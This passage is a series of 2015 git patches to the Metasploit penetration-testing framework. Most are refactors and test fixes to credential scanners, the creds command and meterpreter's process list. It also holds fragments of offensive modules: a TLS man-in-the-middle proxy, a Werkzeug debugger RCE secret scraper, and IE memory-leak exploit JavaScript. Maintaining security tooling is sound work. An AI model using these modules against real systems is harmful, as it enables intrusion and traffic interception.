     mod = framework.auxiliary.create('scanner/http/splunk_web_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_cctv_dvr_login
     mod = framework.auxiliary.create('scanner/misc/cctv_dvr_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_http_vcms_login
     mod = framework.auxiliary.create('scanner/http/vcms_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_telnet_ruggedcom
     mod = framework.auxiliary.create('scanner/telnet/telnet_ruggedcom')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: 'factory', password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: 'factory', password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_vmware_http_login
     mod = framework.auxiliary.create('scanner/vmware/vmware_http_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_asterisk_login
     mod = framework.auxiliary.create('voip/asterisk_login')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_hp_imc_som_create_account
@@ -299,6 +299,31 @@ class Metasploit3 < Msf::Auxiliary
     mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap-businessobjects', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
+  def test_sap_businessobjects_user_brute
+    mod = framework.auxiliary.create('scanner/http/sap_businessobjects_user_brute')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap-businessobjects', user: FAKE_USER, proof: FAKE_PROOF)
+  end
+
+  def test_rfcode_reader_enum
+    mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_radware_appdictor_enum
+    mod = framework.auxiliary.create('scanner/http/radware_appdirector_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'Radware AppDirector', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_pocketpad_login
+    mod = framework.auxiliary.create('scanner/http/pocketpad_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'PocketPAD Portal', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_oracle_ilom_login
+    mod = framework.auxiliary.create('scanner/http/oracle_ilom_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'Oracle Integrated Lights Out Manager Portal', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
   def run
     self.methods.each do |m|
       next if m.to_s !~ /^test_.+/

From f5387ab3f2d05b2ad8793bef95a7b8029dbedb4f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 23 Jul 2015 20:49:18 -0500
Subject: [PATCH 0869/1013] Fix #5766, check res for send_request_raw

Fix #5766
---
 .../auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb  | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index 0ee3145011..67a5bdd222 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -88,6 +88,11 @@ class Metasploit3 < Msf::Auxiliary
         }
       )
 
+      unless res
+        vprint_error("#{peer} - Timed out :-(")
+        return Exploit::CheckCode::Unknown
+      end
+
       vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
 
       if res && res.body.include?('Requested Range Not Satisfiable')

From 866a99ed07111b8bde4879e80b6416f2497cc76e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 23 Jul 2015 20:51:21 -0500
Subject: [PATCH 0870/1013] This is better

---
 .../scanner/http/ms15_034_http_sys_memory_dump.rb         | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index 67a5bdd222..a0a33b9188 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -88,14 +88,8 @@ class Metasploit3 < Msf::Auxiliary
         }
       )
 
-      unless res
-        vprint_error("#{peer} - Timed out :-(")
-        return Exploit::CheckCode::Unknown
-      end
-
-      vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
-
       if res && res.body.include?('Requested Range Not Satisfiable')
+        vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
         vprint_status("#{vmessage} - Vulnerable")
 
         # Save the file that we want to use for the information leak

From 1f95491b45b2d1b4d6400cdad2d23942c4364b85 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 24 Jul 2015 10:35:47 -0500
Subject: [PATCH 0871/1013] Drop bang method and tweak formatting

---
 lib/msf/core/exploit/cmdstager.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 79998c7728..3f9a656ea7 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -112,7 +112,7 @@ module Exploit::CmdStager
   def generate_cmdstager(opts = {}, pl = nil)
     select_cmdstager(opts)
 
-    exe_opts = { code: pl }.merge!(opts)
+    exe_opts = {code: pl}.merge(opts)
     self.exe = generate_payload_exe(exe_opts)
 
     if exe.nil?

From 45b4334006932100e4c16093ddad3c18d9876db8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 24 Jul 2015 11:16:09 -0500
Subject: [PATCH 0872/1013] Use Rex::Socket::SslTcpServer

* Also add rex sockets managing
---
 lib/rex/socket/parameters.rb                  |  9 ++++
 lib/rex/socket/ssl_tcp_server.rb              | 10 +++-
 .../openssl_altchainsforgery_mitm_proxy.rb    | 49 +++++++++++++------
 3 files changed, 51 insertions(+), 17 deletions(-)

diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb
index 1866ba37cf..50c4924449 100644
--- a/lib/rex/socket/parameters.rb
+++ b/lib/rex/socket/parameters.rb
@@ -56,6 +56,7 @@ class Rex::Socket::Parameters
   # @option hash [Bool] 'Bool' Create a bare socket
   # @option hash [Bool] 'Server' Whether or not this should be a server
   # @option hash [Bool] 'SSL' Whether or not SSL should be used
+  # @option hash [OpenSSL::SSL::SSLContext] 'SSLContext' Use a pregenerated SSL Context
   # @option hash [String] 'SSLVersion' Specify Auto, SSL2, SSL3, or TLS1 (Auto is
   #   default)
   # @option hash [String] 'SSLCert' A file containing an SSL certificate (for
@@ -117,6 +118,10 @@ class Rex::Socket::Parameters
       self.ssl = false
     end
 
+    if hash['SSLContext']
+      self.sslctx = hash['SSLContext']
+    end
+
     supported_ssl_versions = ['Auto', 'SSL2', 'SSL23', 'TLS1', 'SSL3', :Auto, :SSLv2, :SSLv3, :SSLv23, :TLSv1]
     if (hash['SSLVersion'] and supported_ssl_versions.include? hash['SSLVersion'])
       self.ssl_version = hash['SSLVersion']
@@ -324,6 +329,10 @@ class Rex::Socket::Parameters
   # @return [Bool]
   attr_accessor :ssl
 
+  # Pre configured SSL Context to use
+  # @return [OpenSSL::SSL::SSLContext]
+  attr_accessor :sslctx
+
   # What version of SSL to use (Auto, SSL2, SSL3, SSL23, TLS1)
   # @return [String,Symbol]
   attr_accessor :ssl_version
diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb
index 742685d596..d064f1d99a 100644
--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -48,8 +48,14 @@ module Rex::Socket::SslTcpServer
   end
 
   def initsock(params = nil)
-    raise RuntimeError, "No OpenSSL support" if not @@loaded_openssl
-    self.sslctx  = makessl(params)
+    raise RuntimeError, 'No OpenSSL support' unless @@loaded_openssl
+
+    if params && params.sslctx && params.sslctx.kind_of?(OpenSSL::SSL::SSLContext)
+      self.sslctx = params.sslctx
+    else
+      self.sslctx  = makessl(params)
+    end
+
     super
   end
 
diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
index 07eee136f6..52ed960db9 100644
--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -67,6 +67,21 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
+  def cleanup
+    super
+    return unless @proxy
+
+    begin
+      @proxy.deref if @proxy.kind_of?(Rex::Service)
+      if @proxy.kind_of?(Rex::Socket)
+        @proxy.close
+        @proxy.stop
+      end
+      @proxy = nil
+    rescue ::Exception
+    end
+  end
+
   def run
     host = datastore['HOST']
     port = datastore['PORT']
@@ -132,17 +147,25 @@ class Metasploit3 < Msf::Auxiliary
     context.extra_chain_cert = [leaf_cert, subinter_ca_cert]
     context.key = fake_key
 
-    tcp_server = TCPServer.new(local_host, local_port)
-    proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context)
-    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+    @proxy = Rex::Socket::SslTcpServer.create(
+      'LocalHost' => local_host,
+      'LocalPort' => local_port,
+      'SSLContext' => context,
+      'Context'   =>
+        {
+          'Msf'        => framework,
+          'MsfExploit' => self
+        })
+
+    print_status('Listening on %s:%d' % [local_host, local_port])
 
     thread_num = 0
 
     loop do
-      framework.threads.spawn("Thread #{thread_num += 1}", false, proxy.accept) do |client|
+      framework.threads.spawn("Thread #{thread_num += 1}", false, @proxy.accept) do |client|
+        add_socket(client)
         application_data = ''
-
-        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+        print_status('Accepted connection from %s:%d' % [client.peerhost, client.peerport])
 
         server = Rex::Socket::Tcp.create(
           'PeerHost' => host,
@@ -154,6 +177,7 @@ class Metasploit3 < Msf::Auxiliary
               'Msf'        => framework,
               'MsfExploit' => self
             })
+        add_socket(server)
 
         print_status('Connected to %s:%d' % [host, port])
 
@@ -162,20 +186,17 @@ class Metasploit3 < Msf::Auxiliary
             readable, _, _ = IO.select([client, server])
 
             readable.each do |r|
-              data = r.readpartial(4096)
+              data = r.get_once
               print_status('%d bytes received' % [data.bytesize])
 
               application_data << data
 
               case r
               when client
-                count = server.write(data)
-                server.flush
+                count = server.put(data)
                 print_status('%d bytes sent' % [count])
-
               when server
-                count = client.write(data)
-                client.flush
+                count = client.put(data)
                 print_status('%d bytes sent' % [count])
               end
             end
@@ -185,7 +206,7 @@ class Metasploit3 < Msf::Auxiliary
           path = store_loot(
             'tls.application_data',
             'application/octet-stream',
-            client.addr[2],
+            client.peerhost,
             application_data,
             'application_data',
             'TLS session application data'
@@ -203,8 +224,6 @@ class Metasploit3 < Msf::Auxiliary
         server.close
       end
     end
-
-    proxy.close
   end
 
 end

From 75d59be87d9e1967b62304fbb939b0047bebd118 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 24 Jul 2015 14:04:23 -0500
Subject: [PATCH 0873/1013] Resolve #5753, Support Origin for the creds command

Resolve #5753. Add an Origin column and allow the user to search
by origin.
---
 lib/msf/ui/console/command_dispatcher/db.rb | 32 ++++++++++++++++-----
 1 file changed, 25 insertions(+), 7 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index cb372a609d..30f3e2ffcc 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -837,6 +837,7 @@ class Db
     print_line "  -s <svc names>        List creds matching comma-separated service names"
     print_line "  -u,--user <regex>     List users that match this regex"
     print_line "  -t,--type <type>      List creds that match the following types: #{allowed_cred_types.join(',')}"
+    print_line "  -O,--origins          List creds that match these origins"
     print_line "  -R,--rhosts           Set RHOSTS from the results of the search"
 
     print_line
@@ -925,15 +926,16 @@ class Db
   end
 
   def creds_search(*args)
-    host_ranges = []
-    port_ranges = []
-    svcs        = []
-    rhosts      = []
+    host_ranges   = []
+    origin_ranges = []
+    port_ranges   = []
+    svcs          = []
+    rhosts        = []
 
     set_rhosts = false
 
     #cred_table_columns = [ 'host', 'port', 'user', 'pass', 'type', 'proof', 'active?' ]
-    cred_table_columns = [ 'host', 'service', 'public', 'private', 'realm', 'private_type' ]
+    cred_table_columns = [ 'host', 'origin' , 'service', 'public', 'private', 'realm', 'private_type' ]
     user = nil
     delete_count = 0
 
@@ -979,6 +981,9 @@ class Db
         mode = :delete
       when '-R', '--rhosts'
         set_rhosts = true
+      when '-O', '--origins'
+        hosts = args.shift
+        arg_host_range(hosts, origin_ranges)
       else
         # Anything that wasn't an option is a host to search for
         unless (arg_host_range(arg, host_ranges))
@@ -1058,11 +1063,23 @@ class Db
           next
         end
 
+        origin = ''
+        if core.origin.kind_of?(Metasploit::Credential::Origin::Service)
+          origin = core.origin.service.host.address
+        elsif core.origin.kind_of?(Metasploit::Credential::Origin::Session)
+          origin = core.origin.session.host.address
+        end
+
+        if !origin.empty? && origin_ranges.present? && !origin_ranges.any? {|range| range.include?(origin) }
+          next
+        end
+
         if core.logins.empty?
 
           tbl << [
             "", # host
-            "", # port
+            "", # cred
+            "", # service
             core.public,
             core.private,
             core.realm,
@@ -1070,7 +1087,6 @@ class Db
           ]
         else
           core.logins.each do |login|
-
             # If none of this Core's associated Logins is for a host within
             # the user-supplied RangeWalker, then we don't have any reason to
             # print it out. However, we treat the absence of ranges as meaning
@@ -1078,7 +1094,9 @@ class Db
             if host_ranges.present? && !host_ranges.any? { |range| range.include?(login.service.host.address) }
               next
             end
+
             row = [ login.service.host.address ]
+            row << origin
             rhosts << login.service.host.address
             if login.service.name.present?
               row << "#{login.service.port}/#{login.service.proto} (#{login.service.name})"

From 25dde141d6d42b9d200920cc185790f85024f517 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 24 Jul 2015 15:24:18 -0500
Subject: [PATCH 0874/1013] fix rspec

---
 .../ui/console/command_dispatcher/db_spec.rb  | 76 +++++++++----------
 1 file changed, 37 insertions(+), 39 deletions(-)

diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index 28cd600b02..ef35238716 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -107,65 +107,63 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
       context "when the credential is present" do
         it "should show a user that matches the given expression" do
           db.cmd_creds("-u", username)
-          @output.should =~ [
+          expect(@output).to eq([
             "Credentials",
             "===========",
             "",
-            "host  service  public    private   realm  private_type",
-            "----  -------  ------    -------   -----  ------------",
-            "               thisuser  thispass         Password",
-          ]
+            "host  origin  service  public    private   realm  private_type",
+            "----  ------  -------  ------    -------   -----  ------------",
+            "                       thisuser  thispass         Password"
+          ])
         end
 
         it 'should match a regular expression' do
           subject.cmd_creds("-u", "^#{username}$")
-          @output.should =~
-          [
+          expect(@output).to eq([
             "Credentials",
             "===========",
             "",
-            "host  service  public    private   realm  private_type",
-            "----  -------  ------    -------   -----  ------------",
-            "               thisuser  thispass         Password",
-          ]
+            "host  origin  service  public    private   realm  private_type",
+            "----  ------  -------  ------    -------   -----  ------------",
+            "                       thisuser  thispass         Password"
+          ])
         end
 
         it 'should return nothing for a non-matching regular expression' do
           subject.cmd_creds("-u", "^#{nomatch_username}$")
-          @output.should =~
-          [
+          expect(@output).to eq([
             "Credentials",
             "===========",
             "",
-            "host  service  public  private  realm  private_type",
-            "----  -------  ------  -------  -----  ------------",
-          ]
+            "host  origin  service  public  private  realm  private_type",
+            "----  ------  -------  ------  -------  -----  ------------"
+          ])
         end
 
         context "and when the username is blank" do
           it "should show a user that matches the given expression" do
             db.cmd_creds("-u", blank_username)
-            @output.should =~ [
+            expect(@output).to eq([
               "Credentials",
               "===========",
               "",
-              "host  service  public  private        realm  private_type",
-              "----  -------  ------  -------        -----  ------------",
-              "                       nonblank_pass         Password",
-            ]
+              "host  origin  service  public  private        realm  private_type",
+              "----  ------  -------  ------  -------        -----  ------------",
+              "                               nonblank_pass         Password"
+            ])
           end
         end
         context "and when the password is blank" do
           it "should show a user that matches the given expression" do
             db.cmd_creds("-P", blank_password)
-            @output.should =~ [
+            expect(@output).to eq([
               "Credentials",
               "===========",
               "",
-              "host  service  public         private  realm  private_type",
-              "----  -------  ------         -------  -----  ------------",
-              "               nonblank_user                  Password",
-            ]
+              "host  origin  service  public         private  realm  private_type",
+              "----  ------  -------  ------         -------  -----  ------------",
+              "                       nonblank_user                  Password"
+            ])
           end
         end
       end
@@ -174,25 +172,25 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
         context "due to a nonmatching username" do
           it "should return a blank set" do
             db.cmd_creds("-u", nomatch_username)
-            @output.should =~ [
+            expect(@output).to eq([
               "Credentials",
               "===========",
               "",
-              "host  service  public  private  realm  private_type",
-              "----  -------  ------  -------  -----  ------------",
-            ]
+              "host  origin  service  public  private  realm  private_type",
+              "----  ------  -------  ------  -------  -----  ------------"
+            ])
           end
         end
         context "due to a nonmatching password" do
           it "should return a blank set" do
             db.cmd_creds("-P", nomatch_password)
-            @output.should =~ [
+            expect(@output).to eq([
               "Credentials",
               "===========",
               "",
-              "host  service  public  private  realm  private_type",
-              "----  -------  ------  -------  -----  ------------",
-            ]
+              "host  origin  service  public  private  realm  private_type",
+              "----  ------  -------  ------  -------  -----  ------------"
+            ])
           end
         end
       end
@@ -257,14 +255,14 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
           it "should show just the password" do
             db.cmd_creds("-t", "password")
             # Table matching really sucks
-            @output.should =~ [
+            expect(@output).to eq([
               "Credentials",
               "===========",
               "",
-              "host  service  public    private   realm  private_type",
-              "----  -------  ------    -------   -----  ------------",
-              "               thisuser  thispass         Password"
-            ]
+              "host  origin  service  public    private   realm  private_type",
+              "----  ------  -------  ------    -------   -----  ------------",
+              "                       thisuser  thispass         Password"
+            ])
           end
         end
 

From a163606513e4df31578cf8b6659136f461828a94 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 24 Jul 2015 15:29:56 -0500
Subject: [PATCH 0875/1013] Delete unused SLEEP option

---
 modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
index 75ed88993f..a42df5dca4 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
@@ -51,8 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
-        OptInt.new('SLEEP',
-          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
         OptString.new('TARGETURI',
           [true, 'Base path to the SysAid application', '/sysaid/'])
       ], self.class)
@@ -92,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # The server either returns a 200 OK when the upload is successful.
     if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+      print_status("#{peer} - Upload appears to have been successful, waiting for deployment")
     else
       fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
     end
@@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # Failure. The request timed out or the server went away.
       break if res.nil?
       # Success! Triggered the payload, should have a shell incoming
-      break if res.code == 200
+      return if res.code == 200
     end
     print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
 

From 2c9183fa569424a7ca6b9566014633f1c2845d24 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 24 Jul 2015 16:14:43 -0500
Subject: [PATCH 0876/1013] Return check code

---
 modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
index a42df5dca4..c43da63a86 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
@@ -72,6 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
     if res && res.code == 200
       return Exploit::CheckCode::Detected
     end
+
+    Exploit::CheckCode::Unknown
   end
 
 

From 456124160908c638d22684f6becc0394187e6a04 Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Fri, 24 Jul 2015 20:34:40 -0400
Subject: [PATCH 0877/1013] updates per @jvazquez-r7 comments

---
 modules/exploits/multi/http/werkzeug_debug_rce.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index 0c5a6d662c..cae53152f9 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -25,7 +25,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
       'References'  =>
           [
-            [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+            [ 'URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
           ],
       'License'     => MSF_LICENSE,
       'Platform'       => ['python'],
@@ -48,7 +48,7 @@ class Metasploit4 < Msf::Exploit::Remote
     })
     #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
     if res and res.body =~ /Werkzeug powered traceback interpreter/
-      return Exploit::CheckCode::Vulnerable
+      return Exploit::CheckCode::Appears
     end
     return Exploit::CheckCode::Safe
   end
@@ -59,8 +59,8 @@ class Metasploit4 < Msf::Exploit::Remote
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['TARGETURI'])
     })
-    if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
-      secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+    if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
+      secret = $1
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',

From a7b5890dc517f59532278b8f66a385643d9e2c10 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 25 Jul 2015 15:39:20 -0700
Subject: [PATCH 0878/1013] Fix URIPATH=/ and stack trace on missing ntdll
 version match

---
 modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
index 2fac28419d..ea653fb54d 100644
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -279,6 +279,8 @@ function exploit(){
 
   def html_info_leak
 
+    uri_prefix = "#{get_resource.chomp("/")}/#{@second_stage_url}".gsub('//', '/')
+
     js_trigger = %Q|
 var rect_array = new Array()
 var a = new Array()
@@ -318,7 +320,7 @@ function exploit(){
       var leak = a[i].marginLeft;
       vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
       vml1.dashstyle.array.length = length_orig;
-      document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
+      document.location = "#{uri_prefix}?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
       return;
     }
   }
@@ -414,7 +416,7 @@ function exploit(){
         @ntdll_version = "6.1.7601.17725" # MS12-001
         @ntdll_base = leak - 0x47090
       else
-        print_warning("ntdll version not detected, sending 404: #{agent}")
+        print_warning("ntdll version not detected, sending 404")
         send_not_found(cli)
         return
       end

From 226516ef2057c29284950ccf6a7169e3ce5002ec Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sat, 25 Jul 2015 17:31:56 -0500
Subject: [PATCH 0879/1013] restore PPID to the meterpreter process list table

This restores pre-66bd881ac5a6de636c2eea7528946bc2d3abd52c behavior, but merges
the current search and output fixups currently in the tree.
---
 .../extensions/stdapi/sys/process.rb          | 19 ++++++++--
 .../console/command_dispatcher/stdapi/sys.rb  | 38 +++----------------
 2 files changed, 21 insertions(+), 36 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
index cd197ff64b..92f77b3567 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -391,13 +391,26 @@ class ProcessList < Array
     cols.delete_if { |c| !( first.has_key?(c.downcase) ) or first[c.downcase].nil? }
 
     opts = {
-      "Header"  => "Process List",
-      "Columns" => cols
+      'Header' => 'Process List',
+      'Indent' => 1,
+      'Columns' => cols
     }.merge(opts)
 
     tbl = Rex::Ui::Text::Table.new(opts)
     each { |process|
-      tbl << cols.map {|c| process[c.downcase] }.compact
+      tbl << cols.map { |c|
+        col = c.downcase
+        val = process[col]
+        if col == 'session'
+          val == 0xFFFFFFFF ? '' : val.to_s
+        elsif col == 'arch'
+          # for display and consistency with payload naming we switch the internal
+          # 'x86_64' value to display 'x64'
+          val == ARCH_X86_64 ? 'x64' : val
+        else
+          val
+        end
+      }.compact
     }
 
     tbl
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 1108262a5e..ec7d4c0f93 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -447,14 +447,14 @@ class Console::CommandDispatcher::Stdapi::Sys
             print_line "You must select either x86 or x86_64"
             return false
           end
-          searched_procs << proc	if proc["arch"] == val
+          searched_procs << proc if proc["arch"] == val
         end
         processes = searched_procs
       when "-s"
         print_line "Filtering on SYSTEM processes..."
         searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
         processes.each do |proc|
-          searched_procs << proc	if proc["user"] == "NT AUTHORITY\\SYSTEM"
+          searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM"
         end
         processes = searched_procs
       when "-U"
@@ -465,46 +465,18 @@ class Console::CommandDispatcher::Stdapi::Sys
             print_line "You must supply a search term!"
             return false
           end
-          searched_procs << proc	if proc["user"].match(/#{val}/)
+          searched_procs << proc if proc["user"].match(/#{val}/)
         end
         processes = searched_procs
       end
     }
 
-    tbl = Rex::Ui::Text::Table.new(
-      'Header'  => "Process list",
-      'Indent'  => 1,
-      'Columns' =>
-        [
-          "PID",
-          "Name",
-          "Arch",
-          "Session",
-          "User",
-          "Path"
-        ],
-      'SearchTerm' => search_term)
-
-    processes.each { |ent|
-      session = ent['session'] == 0xFFFFFFFF ? '' : ent['session'].to_s
-      arch    = ent['arch']
-
-      # for display and consistency with payload naming we switch the internal 'x86_64' value to display 'x64'
-      if( arch == ARCH_X86_64 )
-        arch = "x64"
-      end
-
-      row = [ ent['pid'].to_s, ent['name'], arch, session, ent['user'], ent['path'] ]
-
-      tbl << row #if (search_term.nil? or row.join(' ').to_s.match(search_term))
-    }
-
     if (processes.length == 0)
       print_line("No running processes were found.")
     else
+      tbl = processes.to_table('SearchTerm' => search_term)
       print_line
-      print("\n" + tbl.to_s + "\n")
-      print_line
+      print_line(tbl.to_s)
     end
     return true
   end

